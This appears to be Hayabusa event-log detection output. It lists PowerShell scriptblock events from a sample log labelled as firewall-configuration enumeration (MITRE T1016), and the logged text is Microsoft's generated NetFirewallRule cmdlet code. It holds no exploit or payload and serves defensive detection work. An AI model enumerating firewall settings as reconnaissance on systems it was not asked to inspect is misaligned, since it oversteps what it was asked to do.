[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 